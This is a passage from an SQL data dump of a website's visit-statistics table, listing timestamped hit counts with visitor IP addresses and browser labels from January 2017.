64.187','chrome'),(82269,1483951266,1,0,1,0,'68.180.229.254',''),(82270,1483951372,1,1,0,0,'163.172.64.227','other'),(82271,1483951513,1,1,0,0,'66.249.64.59','chrome'),(82272,1483952399,1,1,0,0,'141.8.183.25','other'),(82273,1483953651,1,1,0,0,'130.180.217.39','chrome'),(82274,1483953763,1,1,0,0,'46.188.71.228','other'),(82275,1483954302,1,1,0,0,'66.102.9.27','other'),(82276,1483954433,1,1,0,0,'207.46.13.1','other'),(82277,1483954639,1,1,0,0,'163.172.64.233','other'),(82278,1483955950,1,1,0,0,'78.111.185.237','firefox'),(82279,1483956042,1,1,0,0,'95.133.157.113','firefox'),(82280,1483957035,1,1,0,0,'163.172.64.247','other'),(82281,1483957510,1,0,1,0,'66.249.64.179',''),(82282,1483957947,1,1,0,0,'77.90.252.172','chrome'),(82283,1483958979,1,0,1,0,'66.249.64.187',''),(82284,1483959305,1,1,0,0,'91.196.178.34','chrome'),(82285,1483960170,1,0,1,0,'66.249.64.61',''),(82286,1483960316,3,0,3,0,'66.249.64.187',''),(82287,1483960587,1,0,1,0,'66.249.64.179',''),(82288,1483961363,1,1,0,0,'91.196.178.34','chrome'),(82289,1483962177,4,4,0,0,'62.210.162.42','chrome'),(82290,1483962865,1,1,0,0,'46.201.58.37','other'),(82291,1483963244,2,2,0,0,'40.77.167.3','other'),(82292,1483963586,1,1,0,0,'193.194.127.217','firefox'),(82293,1483963918,1,1,0,0,'66.249.64.59','chrome'),(82294,1483966897,1,0,1,0,'66.249.64.59',''),(82295,1483967628,1,0,1,0,'66.249.64.179',''),(82296,1483967916,1,1,0,0,'66.102.9.29','other'),(82297,1483968010,1,1,0,0,'54.175.111.49','other'),(82298,1483971186,1,0,1,0,'66.249.64.187',''),(82299,1483971257,1,1,0,0,'37.55.227.92','firefox'),(82300,1483971307,1,1,0,0,'130.180.217.39','chrome'),(82301,1483971483,1,1,0,0,'163.172.64.254','other'),(82302,1483971599,1,1,0,0,'91.196.178.165','chrome'),(82303,1483972948,1,0,1,0,'66.249.64.61',''),(82304,1483973406,1,1,0,0,'46.211.155.36','other'),(82305,1483973979,1,0,1,0,'66.249.64.183',''),(82306,1483974711,1,1,0,0,'46.201.58.37','chrome'),(82307,1483974839,1,1,0,0,'157.55.39.57','other'),(82308,1483974957,1,1,0,0,'66.249.64.179','chrome'),(82309,1483975823,1,1,0,0,'193.164.95.40','chrome'),(82310,1483976955,1,1,0,0,'66.249.64.59','chrome'),(82311,1483977540,1,1,0,0,'66.249.64.61','chrome'),(82312,1483977811,1,1,0,0,'178.219.92.77','chrome'),(82313,1483978606,1,1,0,0,'195.149.70.22','chrome'),(82314,1483979044,1,1,0,0,'66.249.64.179','chrome'),(82315,1483979574,2,2,0,0,'66.249.64.57','chrome'),(82316,1483979633,1,1,0,0,'66.249.93.157','chrome'),(82317,1483980002,1,1,0,0,'163.172.64.243','other'),(82318,1483980511,1,1,0,0,'66.249.64.59','chrome'),(82319,1483980857,1,0,1,0,'66.249.64.183',''),(82320,1483982531,1,1,0,0,'66.102.9.25','other'),(82321,1483982740,1,1,0,0,'93.74.176.187','chrome'),(82322,1483984290,1,1,0,0,'46.211.252.84','chrome'),(82323,1483984410,1,0,1,0,'66.249.64.59',''),(82324,1483984489,1,1,0,0,'163.172.64.227','other'),(82325,1483985248,1,0,1,0,'66.249.73.248',''),(82326,1483987437,1,1,0,0,'52.86.176.3','other'),(82327,1483988982,1,1,0,0,'157.55.39.57','other'),(82328,1483990123,1,1,0,0,'66.249.64.57','chrome'),(82329,1483990904,1,1,0,0,'141.8.183.25','other'),(82330,1483991550,1,1,0,0,'157.55.39.76','other'),(82331,1483991669,1,1,0,0,'163.172.64.247','other'),(82332,1483993740,1,1,0,0,'66.102.9.27','chrome'),(82333,1483993961,2,2,0,0,'91.209.51.22','other'),(82334,1483995012,1,1,0,0,'195.154.181.162','chrome'),(82335,1483996837,1,1,0,0,'66.102.9.27','other'),(82336,1483996954,1,0,1,0,'66.249.64.183',''),(82337,1483997244,1,1,0,0,'130.180.217.39','chrome'),(82338,1483997319,1,1,0,0,'91.213.59.174','chrome'),(82339,1483997332,1,1,0,0,'130.193.51.19','other'),(82340,1484000263,1,0,1,0,'66.249.64.59',''),(82341,1484000598,1,0,1,0,'66.249.64.183',''),(82342,1484002262,1,0,1,0,'66.249.64.187',''),(82343,1484002352,1,1,0,0,'37.53.226.11','firefox'),(82344,1484002370,1,1,0,0,'141.8.142.175','other'),(82345,1484004249,1,0,1,0,'66.249.64.183',''),(82346,1484004365,1,1,0,0,'163.172.64.235','other'),(82347,1484006604,1,1,0,0,'163.172.64.180','other'),(82348,1484006631,1,1,0,0,'163.172.64.245','other'),(82349,1484006733,1,1,0,0,'40.77.167.3','other'),(82350,1484007404,1,1,0,0,'157.55.39.57','other'),(82351,1484007835,1,1,0,0,'178.137.83.166','chrome'),(82352,1484008909,2,1,1,0,'66.249.64.179',''),(82353,1484008927,1,1,0,0,'66.249.64.59','chrome'),(82354,1484009207,1,1,0,0,'40.77.167.3','other'),(82355,1484009371,1,1,0,0,'176.195.235.115','msie'),(82356,1484010790,1,1,0,0,'217.69.133.169','firefox'),(82357,1484011188,1,1,0,0,'66.102.9.27','other'),(82358,1484014130,1,0,1,0,'66.249.64.61',''),(82359,1484014161,1,1,0,0,'130.193.51.19','other'),(82360,1484014820,2,0,2,0,'68.180.229.254',''),(82361,1484016048,1,0,1,0,'66.249.64.187',''),(82362,1484016397,2,2,0,0,'94.25.231.199','firefox'),(82363,1484017214,1,1,0,0,'163.172.64.254','other'),(82364,1484017574,1,0,1,0,'68.180.229.254',''),(82365,1484020438,1,1,0,0,'157.55.39.57','other'),(82366,1484022271,1,1,0,0,'66.249.64.61','chrome'),(82367,1484023655,1,1,0,0,'66.249.64.57','chrome'),(82368,1484024351,1,1,0,0,'40.77.167.3','other'),(82369,1484024765,2,0,2,0,'66.249.64.179',''),(82370,1484024920,1,0,1,0,'66.249.64.187',''),(82371,1484025385,1,0,1,0,'66.249.64.57',''),(82372,1484025683,1,1,0,0,'163.172.64.178','other'),(82373,1484025745,1,1,0,0,'66.102.9.27','other'),(82374,1484026228,1,1,0,0,'40.77.167.49','other'),(82375,1484027292,1,1,0,0,'91.196.178.66','firefox'),(82376,1484027312,1,1,0,0,'40.77.167.3','other'),(82377,1484028153,9,9,0,0,'46.4.116.197','other'),(82378,1484029751,1,0,1,0,'68.180.229.254',''),(82379,1484029821,1,1,0,0,'66.249.64.187','chrome'),(82380,1484030342,1,1,0,0,'62.122.204.125','chrome'),(82381,1484030663,1,1,0,0,'91.196.178.65','chrome'),(82382,1484030994,1,0,1,0,'66.249.64.59',''),(82383,1484031031,1,1,0,0,'163.172.64.225','other'),(82384,1484031771,1,1,0,0,'91.196.178.65','chrome'),(82385,1484032545,1,1,0,0,'141.8.142.175','other'),(82386,1484032768,1,1,0,0,'91.196.178.70','firefox'),(82387,1484033236,1,1,0,0,'204.79.180.143','msie'),(82388,1484033399,2,2,0,0,'91.196.178.68','chrome'),(82389,1484033638,1,1,0,0,'91.196.178.70','chrome'),(82390,1484033688,1,1,0,0,'130.180.211.150','chrome'),(82391,1484033927,1,1,0,0,'180.76.15.14','other'),(82392,1484034183,1,1,0,0,'92.112.248.31','chrome'),(82393,1484034213,2,2,0,0,'91.196.178.167','firefox'),(82394,1484035671,1,1,0,0,'141.8.142.175','other'),(82395,1484036590,1,1,0,0,'91.196.178.167','firefox'),(82396,1484036610,1,1,0,0,'91.196.178.70','firefox'),(82397,1484036637,1,1,0,0,'91.196.178.70','chrome'),(82398,1484036649,1,1,0,0,'93.74.212.147','firefox'),(82399,1484036739,1,0,1,0,'66.249.64.183',''),(82400,1484036884,9,9,0,0,'46.4.32.75','other'),(82401,1484037045,1,1,0,0,'163.172.64.229','other'),(82402,1484037671,1,1,0,0,'91.196.178.70','firefox'),(82403,1484037695,1,1,0,0,'94.178.6.87','chrome'),(82404,1484037852,1,1,0,0,'92.113.201.117','opera'),(82405,1484038223,1,1,0,0,'91.196.178.69','chrome'),(82406,1484038512,1,1,0,0,'87.76.66.54','chrome'),(82407,1484038978,1,1,0,0,'92.113.63.232','chrome'),(82408,1484039028,1,1,0,0,'180.76.15.5','other'),(82409,1484039144,2,0,2,0,'66.249.64.61',''),(82410,1484039299,1,0,1,0,'66.249.64.57',''),(82411,1484039344,1,1,0,0,'194.44.28.82','chrome'),(82412,1484039432,1,0,1,0,'68.180.229.254',''),(82413,1484039453,1,1,0,0,'91.196.177.46','chrome'),(82414,1484040042,1,1,0,0,'66.102.9.29','other'),(82415,1484040873,1,1,0,0,'163.172.64.249','other'),(82416,1484041043,1,1,0,0,'217.25.198.9','chrome'),(82417,1484041199,2,2,0,0,'91.196.178.167','firefox'),(82418,1484041310,1,1,0,0,'78.111.190.23','firefox'),(82419,1484041461,1,0,1,0,'66.249.64.179',''),(82420,1484042724,1,1,0,0,'91.196.178.167','firefox'),(82421,1484043059,1,1,0,0,'176.118.49.113','chrome'),(82422,1484043541,1,1,0,0,'91.196.178.67','firefox'),(82423,1484043646,1,1,0,0,'194.44.28.82','chrome'),(82424,1484043744,1,1,0,0,'91.196.178.65','chrome'),(82425,1484044307,2,2,0,0,'91.196.178.70','firefox'),(82426,1484044372,1,0,1,0,'68.180.229.254',''),(82427,1484044859,1,1,0,0,'91.196.177.26','chrome'),(82428,1484045635,2,2,0,0,'91.196.178.71','firefox'),(82429,1484046647,1,1,0,0,'91.196.178.167','firefox'),(82430,1484047089,1,0,1,0,'66.249.64.187',''),(82431,1484049062,1,1,0,0,'163.172.64.237','other'),(82432,1484049162,1,0,1,0,'66.249.64.183',''),(82433,1484049509,1,1,0,0,'176.102.223.50','chrome'),(82434,1484049564,1,1,0,0,'66.249.93.156','chrome'),(82435,1484050491,1,1,0,0,'91.196.178.130','firefox'),(82436,1484050733,1,1,0,0,'157.55.39.57','other'),(82437,1484051458,1,1,0,0,'91.229.121.1','opera'),(82438,1484051726,1,1,0,0,'37.54.61.16','chrome'),(82439,1484052059,2,2,0,0,'37.53.231.127','chrome'),(82440,1484052940,1,1,0,0,'81.162.230.136','chrome'),(82441,1484053805,1,1,0,0,'91.196.178.70','firefox'),(82442,1484054117,3,0,3,0,'68.180.229.254',''),(82443,1484054482,1,1,0,0,'66.102.9.27','other'),(82444,1484054765,1,1,0,0,'79.165.20.230','chrome'),(82445,1484054892,1,1,0,0,'91.196.178.71','firefox'),(82446,1484054923,1,0,1,0,'66.249.64.179',''),(82447,1484054931,1,1,0,0,'66.249.64.57','chrome'),(82448,1484055253,1,1,0,0,'91.196.178.167','firefox'),(82449,1484055304,1,1,0,0,'83.170.203.142','other'),(82450,1484055442,1,1,0,0,'95.132.134.128','chrome'),(82451,1484055670,1,1,0,0,'91.196.178.34','chrome'),(82452,1484055998,1,1,0,0,'94.25.231.48','chrome'),(82453,1484056081,2,0,2,0,'66.249.64.179',''),(82454,1484056391,1,1,0,0,'91.196.178.39','chrome'),(82455,1484056513,1,1,0,0,'194.44.26.228','chrome'),(82456,1484056747,1,1,0,0,'37.52.245.122','opera'),(82457,1484057383,1,1,0,0,'95.135.128.109','firefox'),(82458,1484057461,1,1,0,0,'94.179.170.144','chrome'),(82459,1484057707,1,1,0,0,'91.196.177.26','chrome'),(82460,1484057917,1,1,0,0,'37.55.148.137','firefox'),(82461,1484057933,1,1,0,0,'141.8.142.175','other'),(82462,1484058342,1,0,1,0,'66.249.64.183',''),(82463,1484058490,1,1,0,0,'91.196.178.34','chrome'),(82464,1484058519,1,1,0,0,'91.196.177.46','firefox'),(82465,1484059052,1,1,0,0,'141.8.142.58','other'),(82466,1484059072,1,1,0,0,'94.179.33.194','firefox'),(82467,1484059136,1,1,0,0,'95.132.29.206','firefox'),(82468,1484059168,2,2,0,0,'91.196.178.167','firefox'),(82469,1484059359,1,1,0,0,'141.8.183.25','other'),(82470,1484059500,2,2,0,0,'91.196.178.70','firefox'),(82471,1484059519,2,2,0,0,'23.101.61.176','other'),(82472,1484060151,1,0,1,0,'66.249.75.183',''),(82473,1484060481,1,1,0,0,'194.187.216.10','chrome'),(82474,1484060611,1,1,0,0,'66.102.9.25','chrome'),(82475,1484062022,1,1,0,0,'163.172.64.250','other'),(82476,1484062056,1,0,1,0,'66.249.75.183',''),(82477,1484062384,1,0,1,0,'66.249.75.179',''),(82478,1484062484,1,1,0,0,'180.76.15.14','other'),(82479,1484063159,1,1,0,0,'66.249.69.149','chrome'),(82480,1484063227,1,1,0,0,'66.249.69.155','chrome'),(82481,1484063272,1,1,0,0,'66.249.69.152','chrome'),(82482,1484063364,1,1,0,0,'180.76.15.158','other'),(82483,1484063459,1,1,0,0,'130.180.209.86','other'),(82484,1484063692,1,0,1,0,'66.249.75.179',''),(82485,1484063874,1,1,0,0,'163.172.64.245','other'),(82486,1484063948,1,1,0,0,'130.180.219.172','chrome'),(82487,1484064336,1,0,1,0,'66.249.75.187',''),(82488,1484064493,1,1,0,0,'180.76.15.134','other'),(82489,1484064677,1,1,0,0,'163.172.64.246','other'),(82490,1484066485,1,1,0,0,'91.196.178.71','firefox'),(82491,1484066659,1,0,1,0,'66.249.75.183',''),(82492,1484067330,1,1,0,0,'94.179.93.236','chrome'),(82493,1484067851,2,2,0,0,'91.196.178.132','chrome'),(82494,1484067939,1,1,0,0,'66.249.75.183','chrome'),(82495,1484068068,1,1,0,0,'178.219.92.77','chrome'),(82496,1484068881,1,1,0,0,'66.102.9.25','other'),(82497,1484069223,1,1,0,0,'66.249.75.187','chrome'),(82498,1484069245,2,2,0,0,'176.122.106.33','chrome'),(82499,1484069671,1,1,0,0,'163.172.64.187','other'),(82500,1484070148,1,1,0,0,'91.196.178.39','firefox'),(82501,1484070490,2,2,0,0,'141.8.142.175','other'),(82502,1484070491,4,4,0,0,'130.193.50.34','other'),(82503,1484070492,1,1,0,0,'5.255.253.68','other'),(82504,1484070496,1,1,0,0,'5.255.253.47','other'),(82505,1484070507,1,1,0,0,'141.8.142.206','other'),(82506,1484070519,4,4,0,0,'141.8.183.25','other'),(82507,1484070534,1,1,0,0,'141.8.132.30','other'),(82508,1484070544,1,1,0,0,'130.193.51.19','other'),(82509,1484070767,2,2,0,0,'212.37.159.39','chrome'),(82510,1484071022,1,0,1,0,'66.249.69.149',''),(82511,1484071153,1,0,1,0,'68.180.229.190',''),(82512,1484071154,1,1,0,0,'163.172.64.245','other'),(82513,1484071765,1,1,0,0,'163.172.64.183','other'),(82514,1484072349,1,1,0,0,'52.86.176.3','other'),(82515,1484073454,1,1,0,0,'91.196.178.34','chrome'),(82516,1484075064,1,1,0,0,'193.194.127.217','firefox'),(82517,1484075287,1,1,0,0,'130.193.50.34','other'),(82518,1484076138,1,0,1,0,'66.249.75.179',''),(82519,1484077179,1,1,0,0,'66.249.75.183','chrome'),(82520,1484078435,1,1,0,0,'77.109.36.31','chrome'),(82521,1484079083,2,2,0,0,'141.8.142.58','other'),(82522,1484079087,1,1,0,0,'130.193.51.19','other'),(82523,1484079218,1,0,1,0,'66.249.75.179',''),(82524,1484079324,4,4,0,0,'66.249.69.155','chrome'),(82525,1484079454,8,8,0,0,'66.249.69.149','chrome'),(82526,1484079483,4,4,0,0,'66.249.69.152','chrome'),(82527,1484080011,1,1,0,0,'91.124.180.75','firefox'),(82528,1484080235,1,0,1,0,'66.249.75.187',''),(82529,1484080300,1,1,0,0,'40.77.167.49','other'),(82530,1484081355,3,3,0,0,'66.249.69.149','chrome'),(82531,1484081359,2,2,0,0,'66.249.69.152','chrome'),(82532,1484081960,1,1,0,0,'66.249.75.187','chrome'),(82533,1484082337,1,1,0,0,'163.172.64.250','other'),(82534,1484082907,2,2,0,0,'130.193.51.19','other'),(82535,1484083344,1,1,0,0,'66.102.9.27','other'),(82536,1484083574,1,1,0,0,'66.249.69.152','chrome'),(82537,1484083703,1,0,1,0,'66.249.75.183',''),(82538,1484084105,1,1,0,0,'66.249.75.187','chrome'),(82539,1484085350,1,1,0,0,'66.249.69.155','chrome'),(82540,1484086527,1,0,1,0,'66.249.75.187',''),(82541,1484086706,4,4,0,0,'130.193.50.34','other'),(82542,1484086801,1,1,0,0,'207.46.13.32','other'),(82543,1484087439,3,3,0,0,'130.193.50.6','other'),(82544,1484087450,2,2,0,0,'141.8.132.10','other'),(82545,1484087459,2,2,0,0,'178.154.189.31','other'),(82546,1484087467,2,2,0,0,'141.8.142.58','other'),(82547,1484087470,1,1,0,0,'66.249.69.149','chrome'),(82548,1484087482,6,6,0,0,'141.8.142.175','other'),(82549,1484087489,5,5,0,0,'141.8.142.61','other'),(82550,1484087501,2,2,0,0,'178.154.189.37','other'),(82551,1484087507,2,2,0,0,'141.8.183.25','other'),(82552,1484087572,4,4,0,0,'130.193.51.19','other'),(82553,1484087584,1,1,0,0,'141.8.142.206','other'),(82554,1484087591,4,4,0,0,'141.8.142.62','other'),(82555,1484087604,7,7,0,0,'141.8.183.19','other'),(82556,1484087613,1,0,1,0,'68.180.229.254',''),(82557,1484087616,1,1,0,0,'130.193.51.14','other'),(82558,1484087624,2,2,0,0,'93.158.152.40','other'),(82559,1484087655,3,3,0,0,'93.158.152.84','other'),(82560,1484087661,1,1,0,0,'130.193.50.4','other'),(82561,1484087668,1,1,0,0,'94.178.163.211','chrome'),(82562,1484087755,1,1,0,0,'5.255.253.67','other'),(82563,1484088015,3,3,0,0,'130.193.50.34','other'),(82564,1484088018,1,1,0,0,'141.8.142.167','other'),(82565,1484088118,1,1,0,0,'178.154.149.11','other'),(82566,1484088124,1,1,0,0,'130.193.51.74','other'),(82567,1484088143,1,1,0,0,'5.255.253.47','other'),(82568,1484088182,1,1,0,0,'93.158.152.26','other'),(82569,1484088240,1,1,0,0,'130.193.51.45','other'),(82570,1484088407,8,8,0,0,'141.8.142.175','other'),(82571,1484088419,1,1,0,0,'141.8.142.61','other'),(82572,1484088467,1,1,0,0,'141.8.183.14','other'),(82573,1484088485,1,1,0,0,'93.158.152.61','other'),(82574,1484088496,2,2,0,0,'141.8.142.67','other'),(82575,1484088517,4,4,0,0,'130.193.51.19','other'),(82576,1484088539,7,7,0,0,'141.8.183.25','other'),(82577,1484088574,1,1,0,0,'93.158.152.84','other'),(82578,1484088710,1,1,0,0,'141.8.142.25','other'),(82579,1484089016,1,1,0,0,'141.8.142.58','other'),(82580,1484089110,1,1,0,0,'130.193.50.34','other'),(82581,1484089250,1,0,1,0,'66.249.75.179',''),(82582,1484089301,1,1,0,0,'180.76.15.16','other'),(82583,1484091850,1,1,0,0,'141.8.142.58','other'),(82584,1484092991,1,1,0,0,'195.154.181.15','chrome'),(82585,1484093360,1,1,0,0,'66.249.69.149','chrome'),(82586,1484093589,2,2,0,0,'66.249.69.152','chrome'),(82587,1484093863,1,1,0,0,'66.249.79.69','chrome'),(82588,1484095383,1,1,0,0,'66.249.69.149','chrome'),(82589,1484095645,1,1,0,0,'66.249.69.155','chrome'),(82590,1484098159,1,0,1,0,'66.249.75.187',''),(82591,1484098878,1,0,1,0,'66.249.69.149',''),(82592,1484099325,1,1,0,0,'163.172.64.237','other'),(82593,1484102150,1,1,0,0,'163.172.64.221','other'),(82594,1484103348,1,1,0,0,'163.172.64.180','other'),(82595,1484105020,1,1,0,0,'66.249.69.152','chrome'),(82596,1484105181,1,1,0,0,'66.249.75.183','chrome'),(82597,1484109464,2,0,2,0,'66.249.75.187',''),(82598,1484109710,1,0,1,0,'66.249.75.179',''),(82599,1484109865,11,11,0,0,'66.249.75.183','chrome'),(82600,1484110005,2,2,0,0,'66.249.75.187','chrome'),(82601,1484110253,11,11,0,0,'66.249.75.179','chrome'),(82602,1484110584,1,1,0,0,'163.172.64.193','other'),(82603,1484110904,2,2,0,0,'66.249.75.183','chrome'),(82604,1484110975,1,1,0,0,'66.249.75.187','chrome'),(82605,1484111783,1,1,0,0,'163.172.64.186','other'),(82606,1484112060,1,1,0,0,'66.249.75.179','chrome'),(82607,1484112795,1,1,0,0,'163.172.64.185','other'),(82608,1484112995,1,0,1,0,'66.249.69.149',''),(82609,1484113611,1,1,0,0,'91.196.178.70','firefox'),(82610,1484114099,1,1,0,0,'159.203.119.14','other'),(82611,1484114464,1,1,0,0,'91.196.178.71','firefox'),(82612,1484115386,1,1,0,0,'91.196.178.71','firefox'),(82613,1484115899,1,1,0,0,'163.172.64.230','other'),(82614,1484116144,1,1,0,0,'66.249.69.149','chrome'),(82615,1484116456,1,1,0,0,'66.249.93.155','chrome'),(82616,1484116673,1,1,0,0,'66.102.9.27','chrome'),(82617,1484116701,1,0,1,0,'66.249.75.179',''),(82618,1484118854,1,1,0,0,'91.196.177.46','firefox'),(82619,1484119292,1,0,1,0,'66.249.75.179',''),(82620,1484119497,1,1,0,0,'91.196.178.36','firefox'),(82621,1484120476,1,1,0,0,'176.118.145.236','chrome'),(82622,1484120912,1,1,0,0,'91.196.178.164','firefox'),(82623,1484121466,1,1,0,0,'163.172.64.193','other'),(82624,1484121990,1,1,0,0,'91.196.178.130','firefox'),(82625,1484122204,1,1,0,0,'163.172.64.199','other'),(82626,1484123023,2,2,0,0,'37.53.239.221','firefox'),(82627,1484123453,1,1,0,0,'91.196.178.72','firefox'),(82628,1484124779,1,1,0,0,'66.249.69.155','chrome'),(82629,1484124818,1,1,0,0,'94.179.44.139','firefox'),(82630,1484125356,1,1,0,0,'78.111.185.76','chrome'),(82631,1484125412,1,1,0,0,'91.196.178.130','chrome'),(82632,1484126032,1,1,0,0,'91.196.178.164','firefox'),(82633,1484126138,1,1,0,0,'91.196.178.161','chrome'),(82634,1484126579,1,1,0,0,'194.44.26.228','chrome'),(82635,1484126793,1,1,0,0,'91.196.178.72','firefox'),(82636,1484127031,1,1,0,0,'95.133.62.69','firefox'),(82637,1484127208,2,2,0,0,'95.108.142.31','other'),(82639,1484127212,1,1,0,0,'130.193.37.7','other'),(82640,1484127216,1,1,0,0,'141.8.142.171','other'),(82641,1484127263,1,1,0,0,'92.112.44.190','firefox'),(82642,1484127318,2,2,0,0,'91.196.178.72','chrome'),(82643,1484127404,1,1,0,0,'130.180.218.95','firefox'),(82644,1484127559,1,1,0,0,'80.91.167.184','firefox'),(82645,1484127641,1,1,0,0,'78.111.187.35','chrome'),(82646,1484127738,1,1,0,0,'163.172.64.245','other'),(82647,1484127904,1,1,0,0,'130.193.50.34','other'),(82648,1484128124,1,1,0,0,'66.249.75.187','chrome'),(82649,1484128232,1,1,0,0,'91.124.113.55','chrome'),(82650,1484128656,1,1,0,0,'94.158.79.134','chrome'),(82651,1484128968,1,1,0,0,'91.196.178.69','chrome'),(82652,1484129980,1,1,0,0,'92.112.44.190','firefox'),(82653,1484131486,1,0,1,0,'66.249.75.187',''),(82654,1484131606,1,1,0,0,'91.196.178.130','chrome'),(82655,1484132035,10,10,0,0,'69.30.198.186','other'),(82656,1484132154,1,1,0,0,'94.158.79.134','chrome'),(82657,1484132190,4,4,0,0,'62.210.162.42','chrome'),(82658,1484132975,1,1,0,0,'163.172.64.251','other'),(82659,1484133038,1,1,0,0,'91.196.178.164','firefox'),(82660,1484133732,1,1,0,0,'78.111.185.76','chrome'),(82661,1484133869,1,0,1,0,'66.249.75.183',''),(82662,1484134618,1,1,0,0,'66.249.69.152','chrome'),(82663,1484134856,2,2,0,0,'66.249.69.149','chrome'),(82664,1484135028,1,1,0,0,'37.53.227.211','chrome'),(82665,1484135289,1,1,0,0,'93.158.152.84','other'),(82666,1484135663,1,1,0,0,'5.255.253.68','other'),(82667,1484135757,1,1,0,0,'5.255.253.67','other'),(82668,1484135759,1,1,0,0,'130.193.50.32','other'),(82669,1484135817,1,1,0,0,'141.8.132.10','other'),(82670,1484136538,1,1,0,0,'213.160.158.249','chrome'),(82671,1484136849,2,2,0,0,'91.196.178.72','firefox'),(82672,1484137654,1,1,0,0,'66.249.69.152','chrome'),(82673,1484137757,1,1,0,0,'91.196.178.72','firefox'),(82674,1484137824,1,1,0,0,'66.249.69.155','chrome'),(82675,1484137980,1,1,0,0,'178.93.130.61','chrome'),(82676,1484137999,1,1,0,0,'141.8.142.61','other'),(82677,1484138080,1,1,0,0,'163.172.64.222','other'),(82678,1484138109,1,1,0,0,'66.249.75.183','chrome'),(82679,1484138349,1,1,0,0,'176.98.70.133','chrome'),(82680,1484139219,1,1,0,0,'91.196.178.164','firefox'),(82681,1484139544,1,1,0,0,'66.249.69.149','chrome'),(82682,1484139938,1,1,0,0,'91.196.178.71','firefox'),(82683,1484140476,1,0,1,0,'66.249.75.187',''),(82684,1484140560,1,1,0,0,'91.196.178.69','chrome'),(82685,1484140896,1,1,0,0,'66.249.69.152','chrome'),(82686,1484141274,1,1,0,0,'91.196.177.26','chrome'),(82687,1484141861,1,1,0,0,'37.115.134.83','chrome'),(82688,1484142254,1,1,0,0,'91.124.239.129','chrome'),(82689,1484143113,1,1,0,0,'31.43.23.229','chrome'),(82690,1484143493,1,1,0,0,'212.26.129.110','firefox'),(82691,1484143522,1,1,0,0,'66.249.75.183','chrome'),(82692,1484143680,1,1,0,0,'195.154.181.15','chrome'),(82693,1484143708,1,1,0,0,'77.247.181.165','chrome'),(82694,1484144379,1,1,0,0,'91.196.178.67','chrome'),(82695,1484144706,1,1,0,0,'193.194.127.217','firefox'),(82696,1484145779,1,1,0,0,'37.115.134.83','chrome'),(82697,1484145915,1,1,0,0,'91.196.178.72','chrome'),(82698,1484146047,1,1,0,0,'91.124.239.129','chrome'),(82699,1484146190,1,1,0,0,'66.249.69.152','chrome'),(82700,1484146441,1,1,0,0,'91.196.178.165','chrome'),(82701,1484146567,1,1,0,0,'37.52.18.6','firefox'),(82702,1484146683,1,1,0,0,'141.8.183.25','other'),(82703,1484146704,2,2,0,0,'141.8.142.175','other'),(82704,1484146751,1,1,0,0,'141.8.142.58','other'),(82705,1484146954,1,1,0,0,'37.53.239.221','firefox'),(82706,1484147042,1,1,0,0,'82.207.113.129','chrome'),(82707,1484147047,1,1,0,0,'95.158.3.62','chrome'),(82708,1484147263,1,1,0,0,'141.8.142.67','other'),(82709,1484147605,1,1,0,0,'130.193.51.74','other'),(82710,1484147660,1,1,0,0,'91.196.178.72','chrome'),(82711,1484148158,1,1,0,0,'93.158.178.38','other'),(82713,1484148159,1,1,0,0,'95.108.142.31','other'),(82714,1484148952,1,1,0,0,'178.94.173.38','chrome'),(82715,1484149198,1,1,0,0,'141.8.183.25','other'),(82716,1484149243,1,1,0,0,'91.196.177.15','chrome'),(82717,1484149654,1,0,1,0,'66.249.75.179',''),(82718,1484150547,1,1,0,0,'163.172.64.178','other'),(82719,1484150745,1,1,0,0,'141.8.183.25','other'),(82720,1484150826,1,0,1,0,'66.249.69.152',''),(82721,1484151710,1,1,0,0,'213.160.158.249','chrome'),(82722,1484151991,4,4,0,0,'195.154.182.171','other'),(82723,1484152953,1,1,0,0,'93.158.152.84','other'),(82724,1484153809,1,1,0,0,'66.249.75.187','chrome'),(82725,1484154738,1,1,0,0,'82.145.222.168','other'),(82726,1484155324,1,1,0,0,'195.10.210.49','chrome'),(82727,1484155495,1,0,1,0,'66.249.75.187',''),(82728,1484157509,1,0,1,0,'66.249.75.179',''),(82729,1484158640,1,1,0,0,'46.164.154.226','opera'),(82730,1484158902,1,1,0,0,'66.249.69.152','chrome'),(82731,1484159400,1,1,0,0,'163.172.64.226','other'),(82732,1484159686,1,1,0,0,'163.172.64.248','other'),(82733,1484160050,2,2,0,0,'66.249.69.149','chrome'),(82734,1484161527,1,1,0,0,'95.10.31.144','other'),(82736,1484163814,1,1,0,0,'141.8.183.19','other'),(82737,1484164490,1,1,0,0,'37.53.133.163','firefox'),(82738,1484164562,4,4,0,0,'62.210.162.42','chrome'),(82739,1484164954,1,0,1,0,'66.249.75.179',''),(82740,1484165995,1,1,0,0,'163.172.64.233','other'),(82741,1484167409,1,0,1,0,'66.249.69.152',''),(82742,1484167437,16,16,0,0,'141.8.142.67','other'),(82743,1484167445,20,20,0,0,'130.193.50.34','other'),(82744,1484167454,5,5,0,0,'93.158.152.84','other'),(82745,1484167476,17,17,0,0,'141.8.142.175','other'),(82746,1484167499,16,16,0,0,'141.8.142.58','other'),(82747,1484167513,13,13,0,0,'141.8.183.25','other'),(82748,1484167518,9,9,0,0,'141.8.142.61','other'),(82749,1484167527,15,15,0,0,'130.193.51.19','other'),(82750,1484167691,1,1,0,0,'66.249.75.179','chrome'),(82751,1484168091,1,1,0,0,'130.193.51.14','other'),(82752,1484168092,1,1,0,0,'141.8.132.30','other'),(82753,1484168098,2,2,0,0,'93.158.152.40','other'),(82754,1484168100,1,1,0,0,'130.193.50.38','other'),(82755,1484168102,2,2,0,0,'141.8.142.62','other'),(82756,1484168109,1,1,0,0,'93.158.152.46','other'),(82757,1484168155,2,2,0,0,'130.193.37.7','other'),(82758,1484168162,2,2,0,0,'5.255.253.47','other'),(82759,1484168168,1,1,0,0,'5.255.253.36','other'),(82760,1484168206,1,1,0,0,'5.255.253.68','other'),(82761,1484168232,1,1,0,0,'141.8.142.25','other'),(82762,1484168254,1,1,0,0,'130.193.50.6','other'),(82763,1484168279,1,1,0,0,'141.8.142.206','other'),(82764,1484169042,1,1,0,0,'91.196.178.69','chrome'),(82765,1484169201,1,1,0,0,'141.8.142.175','other'),(82766,1484169220,1,1,0,0,'130.193.51.19','other'),(82767,1484169236,1,1,0,0,'141.8.142.58','other'),(82768,1484169249,1,1,0,0,'130.193.51.74','other'),(82770,1484169262,1,1,0,0,'178.154.149.10','other'),(82771,1484169272,1,1,0,0,'93.158.152.84','other'),(82772,1484169285,1,1,0,0,'178.154.189.31','other'),(82773,1484171088,1,1,0,0,'163.172.64.245','other'),(82774,1484171659,1,0,1,0,'66.249.75.179',''),(82775,1484172831,1,0,1,0,'66.249.69.155',''),(82776,1484173821,1,1,0,0,'